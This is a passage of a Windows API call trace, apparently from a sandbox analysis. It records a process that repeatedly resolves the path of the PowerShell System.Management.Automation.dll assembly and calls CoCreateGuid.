	[0045.070] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.071] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.072] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.072] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xc26ba97d, Data2=0xf876, Data3=0x4453, Data4=([0]=0x96, [1]=0x2a, [2]=0x86, [3]=0xd6, [4]=0xa7, [5]=0x54, [6]=0x4d, [7]=0x1a))) returned 0x0
	[0045.073] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x2bdf0a33, Data2=0xff96, Data3=0x4bd4, Data4=([0]=0xb9, [1]=0xa0, [2]=0x9, [3]=0xb8, [4]=0x26, [5]=0xae, [6]=0xb7, [7]=0x2e))) returned 0x0
	[0045.073] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x6a314671, Data2=0x8f15, Data3=0x4b5d, Data4=([0]=0x8c, [1]=0x62, [2]=0x1b, [3]=0x6b, [4]=0x88, [5]=0x79, [6]=0xb4, [7]=0x6))) returned 0x0
	[0045.073] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xd7656930, Data2=0x3285, Data3=0x4cff, Data4=([0]=0xb7, [1]=0x24, [2]=0xf1, [3]=0xe3, [4]=0x51, [5]=0xa3, [6]=0xd2, [7]=0x1a))) returned 0x0
	[0045.073] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb5ca4600, Data2=0x118c, Data3=0x4902, Data4=([0]=0x84, [1]=0xab, [2]=0xc, [3]=0xe7, [4]=0x3c, [5]=0x86, [6]=0x2, [7]=0xe1))) returned 0x0
	[0045.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.073] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47bcd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.074] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.076] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47ba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.077] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.078] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xb5936975, Data2=0xa502, Data3=0x41fd, Data4=([0]=0x9f, [1]=0x45, [2]=0x73, [3]=0x21, [4]=0xbe, [5]=0x28, [6]=0xed, [7]=0xd0))) returned 0x0
	[0045.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.078] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.080] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.080] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0xfdbb42f5, Data2=0xcc0e, Data3=0x43a5, Data4=([0]=0xae, [1]=0x72, [2]=0x93, [3]=0xdb, [4]=0xdc, [5]=0x4a, [6]=0xce, [7]=0x19))) returned 0x0
	[0045.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.081] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.082] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c390, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.083] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x8608ce06, Data2=0x3fca, Data3=0x4a70, Data4=([0]=0x9f, [1]=0x5, [2]=0x66, [3]=0x8b, [4]=0x7c, [5]=0xd, [6]=0x7e, [7]=0x65))) returned 0x0
	[0045.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.083] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.084] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.085] CoCreateGuid (in: pguid=0x184b47cfd8 | out: pguid=0x184b47cfd8*(Data1=0x834c816f, Data2=0x558, Data3=0x4681, Data4=([0]=0xb7, [1]=0xc2, [2]=0x93, [3]=0xb7, [4]=0x3a, [5]=0x21, [6]=0x51, [7]=0x11))) returned 0x0
	[0045.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.085] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
	[0045.086] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x184b47c1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Management.Automation\\v4.0_3.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x87
